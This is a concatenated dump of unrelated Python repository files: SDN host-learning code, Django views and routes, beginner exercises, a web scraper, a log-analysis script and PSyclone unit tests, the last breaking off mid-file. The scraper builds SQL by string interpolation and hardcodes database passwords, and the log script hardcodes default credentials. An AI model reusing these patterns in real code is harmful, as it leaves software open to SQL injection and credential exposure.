valve_of.PCP_EXT_PORT_FLAG})\n if port.tagged_vlans and port.loop_protect_external and self.stack:\n external_forwarding_requested = False\n elif not port.stack:\n external_forwarding_requested = True\n\n inst = self.pipeline.output(\n port, vlan, external_forwarding_requested=external_forwarding_requested)\n\n # Output packets for this MAC to specified port.\n ofmsgs.append(self.eth_dst_table.flowmod(\n self.eth_dst_table.match(**match_dict),\n priority=self.host_priority,\n inst=inst,\n idle_timeout=dst_rule_idle_timeout))\n\n if self.has_externals and not port.loop_protect_external:\n match_dict.update({\n valve_of.EXTERNAL_FORWARDING_FIELD: 
valve_of.PCP_NONEXT_PORT_FLAG})\n ofmsgs.append(self.eth_dst_table.flowmod(\n self.eth_dst_table.match(**match_dict),\n priority=self.host_priority,\n inst=inst,\n idle_timeout=dst_rule_idle_timeout))\n\n # If port is in hairpin mode, install a special rule\n # that outputs packets destined to this MAC back out the same\n # port they came in (e.g. multiple hosts on same WiFi AP,\n # and FAUCET is switching between them on the same port).\n if hairpinning:\n ofmsgs.append(self.eth_dst_hairpin_table.flowmod(\n self.eth_dst_hairpin_table.match(in_port=port.number, vlan=vlan, eth_dst=eth_src),\n priority=self.host_priority,\n inst=self.pipeline.output(port, vlan, hairpin=True),\n idle_timeout=dst_rule_idle_timeout))\n\n return ofmsgs\n\n def learn_host_on_vlan_ports(self, now, port, vlan, eth_src,\n delete_existing=True,\n last_dp_coldstart_time=None):\n \"\"\"Learn a host on a port.\"\"\"\n ofmsgs = []\n cache_port = None\n cache_age = None\n entry = vlan.cached_host(eth_src)\n refresh_rules = False\n\n # Host not cached, and no hosts expired since we cold started\n # Enable faster learning by assuming there's no previous host to delete\n if entry is None:\n if (last_dp_coldstart_time and\n (vlan.dyn_last_time_hosts_expired is None or\n vlan.dyn_last_time_hosts_expired < last_dp_coldstart_time)):\n delete_existing = False\n elif entry.port.permanent_learn:\n if entry.port != port:\n ofmsgs.extend(self.pipeline.filter_packets(\n {'eth_src': eth_src, 'in_port': port.number}))\n return (ofmsgs, entry.port, False)\n else:\n cache_age = now - entry.cache_time\n cache_port = entry.port\n\n if cache_port is not None:\n # packet was received on same member of a LAG.\n same_lag = (port.lacp and port.lacp == cache_port.lacp)\n # stacks of size > 2 will have an unknown MAC flooded towards the root,\n # and flooded down again. 
If we learned the MAC on a local port and\n # heard the reflected flooded copy, discard the reflection.\n local_stack_learn = (\n self.stack_root_flood_reflection and port.stack and not cache_port.stack)\n guard_time = self.cache_update_guard_time\n if cache_port == port or same_lag or local_stack_learn:\n # aggressively re-learn on LAGs, and prefer recently learned\n # locally learned hosts on a stack.\n if same_lag or local_stack_learn:\n guard_time = 2\n # recent cache update, don't do anything.\n if cache_age < guard_time:\n return (ofmsgs, cache_port, False)\n # skip delete if host didn't change ports or on same LAG.\n if cache_port == port or same_lag:\n delete_existing = False\n refresh_rules = True\n\n if port.loop_protect:\n ban_age = None\n learn_ban = False\n\n # if recently in loop protect mode and still receiving packets,\n # prolong the ban\n if port.dyn_last_ban_time:\n ban_age = now - port.dyn_last_ban_time\n if ban_age < self.cache_update_guard_time:\n learn_ban = True\n\n # if not in protect mode and we get a rapid move, enact protect mode\n if not learn_ban and entry is not None:\n if port != cache_port and cache_age < self.cache_update_guard_time:\n learn_ban = True\n port.dyn_learn_ban_count += 1\n self.logger.info('rapid move of %s from %s to %s, temp loop ban %s' % (\n eth_src, cache_port, port, port))\n\n # already, or newly in protect mode, apply the ban rules.\n if learn_ban:\n port.dyn_last_ban_time = now\n ofmsgs.append(self._temp_ban_host_learning(\n self.eth_src_table.match(in_port=port.number)))\n return (ofmsgs, cache_port, False)\n\n (src_rule_idle_timeout,\n src_rule_hard_timeout,\n dst_rule_idle_timeout) = self.learn_host_timeouts(port, eth_src)\n\n ofmsgs.extend(self.learn_host_on_vlan_port_flows(\n port, vlan, eth_src, delete_existing, refresh_rules,\n src_rule_idle_timeout, src_rule_hard_timeout,\n dst_rule_idle_timeout))\n\n return (ofmsgs, cache_port, True)\n\n def flow_timeout(self, _now, _table_id, _match):\n \"\"\"Handle a flow timed out message from dataplane.\"\"\"\n return []\n\n\nclass ValveHostFlowRemovedManager(ValveHostManager):\n \"\"\"Trigger relearning on flow removed notifications.\n\n .. 
note::\n\n        not currently reliable.\n    \"\"\"\n\n    def flow_timeout(self, now, table_id, match):\n        ofmsgs = []\n        if table_id in (self.eth_src_table.table_id, self.eth_dst_table.table_id):\n            if 'vlan_vid' in match:\n                vlan = self.vlans[valve_of.devid_present(match['vlan_vid'])]\n                in_port = None\n                eth_src = None\n                eth_dst = None\n                for field, value in match.items():\n                    if field == 'in_port':\n                        in_port = value\n                    elif field == 'eth_src':\n                        eth_src = value\n                    elif field == 'eth_dst':\n                        eth_dst = value\n                if eth_src and in_port:\n                    port = self.ports[in_port]\n                    ofmsgs.extend(self._src_rule_expire(vlan, port, eth_src))\n                elif eth_dst:\n                    ofmsgs.extend(self._dst_rule_expire(now, vlan, eth_dst))\n        return ofmsgs\n\n    def expire_hosts_from_vlan(self, _vlan, _now):\n        return []\n\n    def learn_host_timeouts(self, port, eth_src):\n        \"\"\"Calculate flow timeouts for learning on a port.\"\"\"\n        learn_timeout = self._jitter_learn_timeout(self.learn_timeout, port, eth_src)\n\n        # Disable hard_timeout; the dst rule expires after the src rule.\n        src_rule_idle_timeout = learn_timeout\n        src_rule_hard_timeout = 0\n        dst_rule_idle_timeout = learn_timeout + self.cache_update_guard_time\n        return (src_rule_idle_timeout, src_rule_hard_timeout, dst_rule_idle_timeout)\n\n    def _src_rule_expire(self, vlan, port, eth_src):\n        \"\"\"When a src rule expires, the host is probably inactive or active in\n        receiving but not sending. We just mark the host as expired.\"\"\"\n        ofmsgs = []\n        entry = vlan.cached_host_on_port(eth_src, port)\n        if entry is not None:\n            vlan.expire_cache_host(eth_src)\n            self.logger.info('expired src_rule for host %s' % eth_src)\n        return ofmsgs\n\n    def _dst_rule_expire(self, now, vlan, eth_dst):\n        \"\"\"Expiring a dst rule may indicate that the host is actively sending\n        traffic but not receiving. 
If the src rule has not yet expired, we reinstall\n        the host rules.\"\"\"\n        ofmsgs = []\n        entry = vlan.cached_host(eth_dst)\n        if entry is not None:\n            ofmsgs.extend(self.learn_host_on_vlan_ports(\n                now, entry.port, vlan, eth_dst, delete_existing=False))\n            self.logger.info(\n                'refreshing host %s from VLAN %u' % (eth_dst, vlan.vid))\n        return ofmsgs\n","repo_name":"sdyear/faucet_mpls","sub_path":"faucet/valve_host.py","file_name":"valve_host.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"249293825","text":"import urllib.request,re\r\nurl= \"https://raw.githubusercontent.com/testdami555/python/master/README.md\"\r\nfile = urllib.request.urlopen(url)\r\ntotal = 0\r\nword = \"test\"\r\nlineascount = []\r\nfor line in file:\r\n\tlinea = line.decode('utf-8')\r\n\tcount = len(re.findall(word,linea, re.IGNORECASE))\t\r\n\tprint(linea)\r\n\tprint(count)\r\n\tlineascount.append(count)\r\n\r\nprint(lineascount)\r\nprint(\"Total: \"+ str(sum(lineascount)))","repo_name":"PaulaCarluccio/Nivel-3-Python-Curso","sub_path":"Clase 5/conteoonline.py","file_name":"conteoonline.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41393147828","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Product \nfrom .forms import ProductForm\n# Create your views here.\n\n\n#product create form view\ndef product_create_view(request):\n    form=ProductForm(request.POST or None)\n    if request.method == 'POST':\n        if form.is_valid():\n            form.save()\n            return redirect('/')\n    context={\n        'form': form\n    }\n    return render(request,'products/product_create.html',context)\n\n#update form view\ndef product_update_view(request,id=id):\n    obj = get_object_or_404(Product,id=id)\n    form = ProductForm(request.POST or None,instance=obj)\n    if request.method == 'POST':\n        if form.is_valid():\n            form.save()\n            return redirect('product', obj.id)\n    context={\n        'form': form\n    }\n    return render(request,'products/product_create.html',context)\n\n\n#form delete view\ndef product_delete_view(request,id):\n    obj= get_object_or_404(Product,id=id)\n    print(obj.title)\n    if request.method == \"POST\":\n        obj.delete()\n        return redirect('/')\n    context={\n        'obj':obj\n    }\n    return render(request,'products/product_delete.html',context)\n\n#list view\ndef product_list_view(request):\n    products=Product.objects.all()\n    context={\n        'products': products\n    }\n    return render(request,'products/product_list.html',context)\n\n\n#product detail view\ndef product_detail_view(request,id):\n    product=get_object_or_404(Product,id=id)\n    context={\n        'product':product\n    }\n    return render(request,'products/product_detail.html',context)","repo_name":"akayjoshi/product-site","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36545907594","text":"#Exercício 01\r\n\r\ndef soma(lista):\r\n    soma_nums = sum(lista)\r\n    return soma_nums\r\n\r\ndef quantidade(lista):\r\n    qtd_nums = len(lista)\r\n    return qtd_nums\r\n\r\ndef media(func,lista):\r\n    soma = func(lista)\r\n    media = soma/len(lista)\r\n    return media \r\n\r\ndef soma_positivos(lista):\r\n    lista_positivos =[\r\n        positive for positive in lista if positive \r\n        > 0]\r\n    soma_positivos = sum(lista_positivos)\r\n    return soma_positivos\r\n\r\ndef 
qtd_negativos(lista):\r\n    lista_negativos = [\r\n        negative for negative in lista \r\n        if negative < 0\r\n    ]\r\n    qtd_negativos = len(lista_negativos)\r\n    return qtd_negativos\r\n\r\ndef media_nums_pares(lista):\r\n    sum_pares = 0\r\n    n_pares = 0\r\n    for num in lista:\r\n        if num % 2 == 0:\r\n            sum_pares += num \r\n            n_pares += 1\r\n    media_pares = sum_pares/n_pares \r\n    return media_pares\r\n\r\ndef percentual_numeros_impares(lista):\r\n    lista_impares = []\r\n    for num_impar in lista:\r\n        if num_impar % 2 != 0:\r\n            lista_impares.append(num_impar)\r\n    return (len(lista_impares)/len(lista)) * 100\r\n\r\n\r\nlista_nums = []\r\nwhile True:\r\n    num = input(\"Digite um número inteiro:\")\r\n    \r\n    try:\r\n        num = int(num)\r\n        \r\n        if num == 0:\r\n            break\r\n        \r\n        else:\r\n            lista_nums.append(num)\r\n        \r\n    except ValueError:\r\n        continue\r\n\r\nprint(soma(lista_nums))\r\nprint(quantidade(lista_nums))\r\nprint(media(soma,lista_nums))\r\nprint(soma_positivos(lista_nums))\r\nprint(qtd_negativos(lista_nums))\r\nprint(media_nums_pares(lista_nums))\r\nprint(percentual_numeros_impares(lista_nums))\r\n\r\n#Exercício 02\r\n\r\nlista_nums_1 = []\r\n\r\nfor i in range(5):\r\n    num = int(input(\"Digite um número inteiro:\"))\r\n    lista_nums_1.append(num)\r\nprint(soma(lista_nums_1))\r\nprint(quantidade(lista_nums_1))\r\nprint(media(soma,lista_nums_1))\r\nprint(soma_positivos(lista_nums_1))\r\nprint(qtd_negativos(lista_nums_1))\r\nprint(media_nums_pares(lista_nums_1))\r\nprint(percentual_numeros_impares(lista_nums_1))","repo_name":"LucasZanini096/Mackenzie-Primeiro-Semestre","sub_path":"Labolatório - Algoritmos 1/Vetor_Lista/Exercicios_Extras_3.py","file_name":"Exercicios_Extras_3.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70916822500","text":"class employee:\n    def __init__(self,aname,arole,acourse):\n        self.name=aname\n        self.role=arole\n        self.course=acourse\n    \n    def printdetail(self):\n        return f\"Name is {self.name} and Role is {self.role} and Course is {self.course}\"\n    \nharry=employee(\"Dipesh\",\"Manager\",\"Python\")\nram=employee(\"Ram\",\"Project\",\"Php\")\nprint(harry.printdetail())\nprint(ram.printdetail())\n","repo_name":"dipeshgiri/pythonpractise","sub_path":"oops2.py","file_name":"oops2.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33578245793","text":"import requests\nfrom lxml import etree\nimport pymysql\nimport re\n\n\nclass GovementSpider(object):\n    def __init__(self):\n        self.one_url = 'http://www.mca.gov.cn/article/sj/xzqh/2019/'\n        self.headers = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36\"\n        }\n        self.db = pymysql.connect('localhost', 'root', 'Lxd05230708', 'spider', charset='utf8')\n        self.cursor = self.db.cursor()\n\n    # Extract the second-level page link (a fake link that redirects)\n    def get_false_link(self):\n        html = requests.get(url=self.one_url, headers=self.headers).content.decode('utf-8', 'ignore')\n        parse_html = etree.HTML(html)\n        # xpath://a[@class='artitlelist']\n        r_list = parse_html.xpath(\"//a[@class='artitlelist']\")\n        for r in r_list:\n            # Alternatively, the title attribute could be read like this:\n            # title = r.get('title')\n            title = r.xpath(\"./@title\")[0]\n            # Use a regex to find the first title we need (the first one is normally the latest)\n            if re.findall(r'.*?中华人民共和国县以上行政区划代码.*?', title, re.RegexFlag.S):\n                # Stop at the first match; the first link is always the latest one\n                two_link = 'http://www.mca.gov.cn' + r.xpath('./@href')[0]\n                return two_link\n\n    # 
Extract the real second-level page link (the one that returns the data)\n    def get_true_link(self):\n        two_false_link = self.get_false_link()\n        html = requests.get(url=two_false_link, headers=self.headers).text\n        pattern = re.compile(r'window.location.href=\"(.*?)\"', re.RegexFlag.S)\n        real_link = pattern.findall(html)[0]\n        self.get_data(real_link)\n\n    # The function that actually extracts the data\n    def get_data(self, real_link):\n        html = requests.get(url=real_link, headers=self.headers).text\n        # base xpath: //tr[@height=\"19\"]\n        parse_html = etree.HTML(html)\n        tr_list = parse_html.xpath('//tr[@height=\"19\"]')\n        for tr in tr_list:\n            # code: ./td[2]/text()\n            code = tr.xpath('./td[2]/text()')[0]\n            # name: ./td[3]/text()\n            name = tr.xpath('./td[3]/text()')[0]\n            print(code, name)\n            self.save_sql(code, name)\n\n    def save_sql(self, code, name):\n        self.cursor.execute(\"insert into version values(default, '%s', '%s')\" % (code, name))\n        # The id column must be defined as `id` INT NOT NULL AUTO_INCREMENT with PRIMARY KEY (`id`)\n        self.db.commit()\n\n    # Main entry point\n    def main(self):\n        self.get_true_link()\n        self.cursor.close()\n        self.db.close()\n\n\nif __name__ == \"__main__\":\n    spider = GovementSpider()\n    spider.main()\n","repo_name":"pccode21/PythonLearn","sub_path":"src/spider/GovArea.py","file_name":"GovArea.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12469689478","text":"#!/usr/bin/env python3.6\n\"\"\"Log Analysis project\"\"\"\n\nimport psycopg2\n\ntry:\n    connection = psycopg2.connect(user=\"postgres\", password=\"postgres\",\n                                  host=\"127.0.0.1\",\n                                  port=\"5432\", database=\"news\")\n    cursor = connection.cursor()\n    cursor.execute(\"SELECT version();\")\n    record = cursor.fetchone()\n    print(f\"you are connected to - {record}\")\n    select_q1 = \"\"\" SELECT title, count (*) AS views\n                    FROM articles\n                    INNER JOIN log\n                    ON log.path = '/article/' || articles.slug\n                    GROUP BY title\n                    ORDER BY views DESC\n                    LIMIT 3 \"\"\"\n    cursor.execute(select_q1)\n    records_toview = cursor.fetchall()\n    for title, views in records_toview:\n        print(f\"\\\"{title}\\\" -- {views} views\")\n    select_q2 = \"\"\" SELECT authors.name, views\n                    FROM authors\n                    JOIN (\n                        SELECT sub.author, views\n                        FROM\n                        (\n                            SELECT author, count(*) AS views\n                            FROM articles\n                            INNER JOIN log\n                            ON log.path = '/article/' || articles.slug\n                            GROUP BY author\n                            ORDER BY views DESC\n                            LIMIT 3\n                        ) sub\n                    ) sub2\n                    ON sub2.author=authors.id;\n                \"\"\"\n    cursor.execute(select_q2)\n    for author, views in cursor.fetchall():\n        print(f\"{author} -- {views} views\")\n    # Just test database log\n    select_q3 = \"\"\" SELECT count(status) from log ; \"\"\"\n    cursor.execute(select_q3)\n    count_res = int(cursor.fetchall()[0][0])\n    select_q3_h = \"\"\" SELECT TO_CHAR(log.time :: DATE, 'Mon dd, yyyy')\n                      as date, log.status, Count(*) FROM\n                      log GROUP BY date, log.status \"\"\"\n    cursor.execute(select_q3_h)\n    records = cursor.fetchall()\n    for i in range(0, len(records), 2):\n        val = round(float(int(records[i+1][-1]) /\n                    (1.000 * (int(records[i][-1]) +\n                     int(records[i+1][-1])))), 3)\n        if val > 0.01:\n            val *= 100\n            print(f'{records[i][0]} -- {val}% errors')\n\nexcept (Exception, psycopg2.Error) as error:\n    print(error)\nfinally:\n    # closing database connection.\n    if(connection):\n        cursor.close()\n        connection.close()\n        print(\"connection closed !\")\n","repo_name":"sananand007/FullStack","sub_path":"logAnalysis.py","file_name":"logAnalysis.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70602356900","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# Author: Andy\r\nfrom django.conf.urls import url\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n    url(r'home', home, name='home'),\r\n\r\n    url(r'server/list/$', server, name='server'),\r\n    url(r'server/edit/(?P\\d+)/$', server_edit, name='server_edit'),\r\n    url(r'server/add/$', server_add, name='server_add'),\r\n    url(r'server/delete/(?P\\d+)/$', server_delete, name='server_delete'),\r\n\r\n    url(r'rsa/list/$', rsa, name='rsa'),\r\n    url(r'rsa/add/$', rsa_add, name='rsa_add'),\r\n    url(r'rsa/delete/(?P\\d+)/$', rsa_delete, name='rsa_delete'),\r\n    url(r'rsa/edit/(?P\\d+)/$', rsa_edit, name='rsa_edit'),\r\n\r\n    url(r'project/list/$', project, name='project'),\r\n    url(r'project/add/$', project_add, name='project_add'),\r\n    url(r'project/delete/(?P\\d+)/$', project_delete, name='project_delete'),\r\n    url(r'project/edit/(?P\\d+)/$', project_edit, name='project_edit'),\r\n\r\n    url(r'project/env/list/$', project_env, name='project_env'),\r\n    url(r'project/env/delete/(?P\\d+)/$', project_env_delete, name='project_env_delete'),\r\n    url(r'project/env/edit/(?P\\d+)/$', project_env_edit, name='project_env_edit'),\r\n    url(r'project/env/add/$', project_env_add, name='project_env_add'),\r\n\r\n    url(r'deploy/task/list/(?P\\d+)/$', deploy_task, name='deploy_task'),\r\n    url(r'deploy/task/add/(?P\\d+)$', deploy_task_add, name='deploy_task_add'),\r\n    url(r'deploy/task/edit/(?P\\d+)$', deploy_task_edit, name='deploy_task_edit'),\r\n    url(r'deploy/task/delete/(?P\\d+)$', deploy_task_delete, name='deploy_task_delete'),\r\n\r\n    url(r'deploy/now/(?P\\d+)/$', deploy_now, name='deploy_now'),\r\n    url(r'deploy/channel/(?P\\d+)/$', deploy_by_channel, name='deploy_by_channel'),\r\n\r\n    url(r'git/commits/$', git_commits, name='git_commits')\r\n]\r\n","repo_name":"Andy963/publish_code_demo","sub_path":"apps/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14228320017","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nimport collections\n\n\nclass Solution(object):\n    def findFrequentTreeSum(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[int]\n        \"\"\"\n        if not root:\n            return []\n        \n        freq = collections.defaultdict(int)\n        \n        def dfs(node):\n            if not node:\n                return 0\n            if not node.left and not node.right:\n                freq[node.val] += 1\n                return node.val\n            val = node.val + dfs(node.left) + dfs(node.right)\n            freq[val] += 1\n            return val\n        \n        dfs(root)\n        sorted_freq = sorted(freq.items(), key=lambda p:p[1], reverse=True)\n        return [k for k,v in sorted_freq if v == sorted_freq[0][1]]\n","repo_name":"JinnieJJ/leetcode","sub_path":"508-Most Frequent Subtree Sum.py","file_name":"508-Most Frequent Subtree Sum.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34301616381","text":"import os\nimport pytest\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.errors import InternalError\nfrom psyclone.psyir.nodes import CodeBlock, IfBlock, Literal, Loop, Node, \\\n    Reference, Schedule, Statement, ACCLoopDirective, OMPMasterDirective, \\\n    OMPDoDirective, OMPLoopDirective, Routine\nfrom psyclone.psyir.symbols import DataSymbol, INTEGER_TYPE, BOOLEAN_TYPE, \\\n    ImportInterface, ContainerSymbol\nfrom 
psyclone.psyir.tools import DependencyTools\nfrom psyclone.psyir.transformations import ProfileTrans, RegionTrans, \\\n TransformationError\nfrom psyclone.tests.utilities import get_invoke, Compile\nfrom psyclone.transformations import ACCEnterDataTrans, ACCLoopTrans, \\\n ACCParallelTrans, OMPLoopTrans, OMPParallelLoopTrans, OMPParallelTrans, \\\n OMPSingleTrans, OMPMasterTrans, OMPTaskloopTrans, OMPDeclareTargetTrans\nfrom psyclone.parse.algorithm import parse\nfrom psyclone.psyGen import PSyFactory\n\nGOCEAN_BASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n os.pardir, os.pardir, \"test_files\",\n \"gocean1p0\")\n\n\n@pytest.fixture(name=\"sample_psyir\")\ndef sample_psyir_fixture(fortran_reader):\n ''' Snippet of code converted to PSyIR to use during the tests. '''\n code = '''\n subroutine my_subroutine()\n integer, dimension(10, 10) :: A\n integer :: i\n integer :: j\n do i = 1, 10\n do j = 1, 10\n A(i, j) = 0\n end do\n end do\n do i = 1, 10\n do j = 1, 10\n A(i, j) = 0\n end do\n end do\n end subroutine\n '''\n return fortran_reader.psyir_from_source(code)\n\n\ndef test_accloop():\n ''' Generic tests for the ACCLoopTrans transformation class '''\n trans = ACCLoopTrans()\n assert trans.name == \"ACCLoopTrans\"\n assert str(trans) == \"Adds an 'OpenACC loop' directive to a loop\"\n\n cnode = Statement()\n tdir = trans._directive([cnode])\n assert isinstance(tdir, ACCLoopDirective)\n\n\ndef test_accparallel():\n ''' Generic tests for the ACCParallelTrans class '''\n acct = ACCParallelTrans()\n assert acct.name == \"ACCParallelTrans\"\n assert acct._default_present is True\n\n acct = ACCParallelTrans(default_present=False)\n assert acct.name == \"ACCParallelTrans\"\n assert acct._default_present is False\n\n with pytest.raises(TypeError) as err:\n _ = ACCParallelTrans(default_present=3)\n assert (\"The provided 'default_present' argument must be a boolean, \"\n \"but found '3'.\" in str(err.value))\n\n\ndef test_accenterdata():\n ''' Generic tests for the ACCEnterDataTrans class '''\n acct = ACCEnterDataTrans()\n assert acct.name == \"ACCEnterDataTrans\"\n assert str(acct) == \"Adds an OpenACC 'enter data' directive\"\n\n\ndef test_accenterdata_internalerr(monkeypatch):\n ''' Check that the ACCEnterDataTrans.apply() method raises an internal\n error if the validate method fails to throw out an invalid type of\n Schedule. 
'''\n acct = ACCEnterDataTrans()\n monkeypatch.setattr(acct, \"validate\", lambda sched, options: None)\n with pytest.raises(InternalError) as err:\n acct.apply(\"Not a schedule\")\n assert (\"validate() has not rejected an (unsupported) schedule\"\n in str(err.value))\n\n\ndef test_omptaskloop_no_collapse():\n ''' Check that the OMPTaskloopTrans.directive() method rejects\n the collapse argument '''\n trans = OMPTaskloopTrans()\n cnode = Node()\n with pytest.raises(NotImplementedError) as err:\n trans._directive(cnode, collapse=True)\n assert (\"The COLLAPSE clause is not yet supported for \"\n \"'!$omp taskloop' directives\" in str(err.value))\n\n\ndef test_omptaskloop_getters_and_setters():\n ''' Check that the OMPTaskloopTrans getters and setters\n correctly throw TransformationErrors on illegal values '''\n trans = OMPTaskloopTrans()\n with pytest.raises(TransformationError) as err:\n trans.omp_num_tasks = \"String\"\n assert \"num_tasks must be an integer or None, got str\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_num_tasks = -1\n assert \"num_tasks must be a positive integer, got -1\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = \"String\"\n assert \"grainsize must be an integer or None, got str\" in str(err.value)\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = -1\n assert \"grainsize must be a positive integer, got -1\" in str(err.value)\n trans.omp_num_tasks = 32\n assert trans.omp_num_tasks == 32\n with pytest.raises(TransformationError) as err:\n trans.omp_grainsize = 32\n assert (\"The grainsize and num_tasks clauses would both \"\n \"be specified for this Taskloop transformation\"\n in str(err.value))\n trans.omp_num_tasks = None\n assert trans.omp_num_tasks is None\n trans.omp_grainsize = 32\n assert trans.omp_grainsize == 32\n trans.grainsize = None\n assert trans.grainsize is None\n\n trans = OMPTaskloopTrans(num_tasks=32)\n assert trans.omp_num_tasks == 32\n trans = OMPTaskloopTrans(grainsize=32)\n assert trans.omp_grainsize == 32\n\n with pytest.raises(TransformationError) as err:\n trans = OMPTaskloopTrans(grainsize=32, num_tasks=32)\n assert (\"The grainsize and num_tasks clauses would both \"\n \"be specified for this Taskloop transformation\"\n in str(err.value))\n\n with pytest.raises(TypeError) as err:\n trans = OMPTaskloopTrans(nogroup=32)\n assert \"Expected nogroup to be a bool but got a int\" in str(err.value)\n\n\ndef test_omptaskloop_apply(monkeypatch):\n '''Check that the gen_code method in the OMPTaskloopDirective\n class generates the expected code when passing options to\n the OMPTaskloopTrans's apply method and correctly overrides the\n taskloop's inbuilt value. 
Use the gocean API.\n '''\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n taskloop = OMPTaskloopTrans()\n master = OMPMasterTrans()\n parallel = OMPParallelTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n # Check that the _nogroup clause isn't changed during apply\n assert taskloop._nogroup is False\n taskloop.apply(schedule.children[0], {\"nogroup\": True})\n assert taskloop._nogroup is False\n taskloop_node = schedule.children[0]\n master.apply(schedule.children[0])\n parallel.apply(schedule.children[0])\n\n code = str(psy.gen)\n\n clauses = \" nogroup\"\n assert (\n f\" !$omp parallel default(shared), private(i,j)\\n\"\n f\" !$omp master\\n\"\n f\" !$omp taskloop{clauses}\\n\"\n f\" DO\" in code)\n assert (\n \" END DO\\n\"\n \" !$omp end taskloop\\n\"\n \" !$omp end master\\n\"\n \" !$omp end parallel\" in code)\n\n assert taskloop_node.begin_string() == \"omp taskloop\"\n\n # Create a fake validate function to throw an exception\n def validate(self, options):\n raise TransformationError(\"Fake error\")\n monkeypatch.setattr(taskloop, \"validate\", validate)\n # Test that the nogroup attribute isn't permanently changed if validate\n # throws an exception\n assert taskloop._nogroup is False\n with pytest.raises(TransformationError) as excinfo:\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH,\n \"single_invoke.f90\"), api=\"gocean1.0\")\n schedule = psy.invokes.invoke_list[0].schedule\n taskloop.apply(schedule[0], {\"nogroup\": True})\n assert \"Fake error\" in str(excinfo.value)\n assert taskloop._nogroup is False\n\n\ndef test_ompdeclaretargettrans(sample_psyir, fortran_writer):\n ''' Test OMPDeclareTargetTrans works as expected.'''\n\n # Try to insert an OMPDeclareTarget on a wrong node type\n ompdeclaretargettrans = OMPDeclareTargetTrans()\n loop = sample_psyir.walk(Loop)[0]\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(loop)\n assert (\"The OMPDeclareTargetTrans must be applied to a Routine, but \"\n \"found: 'Loop'.\" in str(err.value))\n\n # Insert an OMPDeclareTarget on a Routine\n routine = sample_psyir.walk(Routine)[0]\n ompdeclaretargettrans.apply(routine)\n expected = '''\\\nsubroutine my_subroutine()\n integer, dimension(10,10) :: a\n integer :: i\n integer :: j\n\n !$omp declare target\n do i = 1, 10, 1\n'''\n assert expected in fortran_writer(sample_psyir)\n\n # If the OMPDeclareTarget directive is already there do not repeat it\n previous_num_children = len(routine.children)\n ompdeclaretargettrans.apply(routine)\n assert previous_num_children == len(routine.children)\n\n\ndef test_ompdeclaretargettrans_with_globals(sample_psyir, parser):\n ''' Test that the OMPDeclareTarget directive is not added if there is any\n global symbol.'''\n ompdeclaretargettrans = OMPDeclareTargetTrans()\n routine = sample_psyir.walk(Routine)[0]\n ref1 = sample_psyir.walk(Reference)[0]\n\n # A symbol not defined in the symbol table will be considered global\n ref1.symbol = DataSymbol(\"new_symbol\", INTEGER_TYPE)\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"Kernel 'my_subroutine' contains accesses to data (variable \"\n \"'new_symbol') that are not present in the Symbol Table(s) within \"\n \"the scope of this routine. 
Cannot transform such a kernel.\"\n in str(err.value))\n\n # If it is local but comes from an import it is also a global\n routine.symbol_table.add(ref1.symbol)\n ref1.symbol.interface = ImportInterface(ContainerSymbol('my_mod'))\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"The Symbol Table for kernel 'my_subroutine' contains the \"\n \"following symbol(s) with imported interface: ['new_symbol']. \"\n \"If these symbols represent data then they must first be \"\n \"converted to kernel arguments using the KernelImportsToArguments \"\n \"transformation. If the symbols represent external routines then \"\n \"PSyclone cannot currently transform this kernel for execution on \"\n \"an OpenMP target.\" in str(err.value))\n\n # If the symbol is inside a CodeBlock it is also captured\n reader = FortranStringReader('''\n subroutine mytest\n not_declared1 = not_declared1 + not_declared2\n end subroutine mytest''')\n prog = parser(reader)\n block = CodeBlock(prog.children[0].children[1].children[0].children,\n CodeBlock.Structure.EXPRESSION)\n ref1.replace_with(block)\n with pytest.raises(TransformationError) as err:\n ompdeclaretargettrans.apply(routine)\n assert (\"Kernel 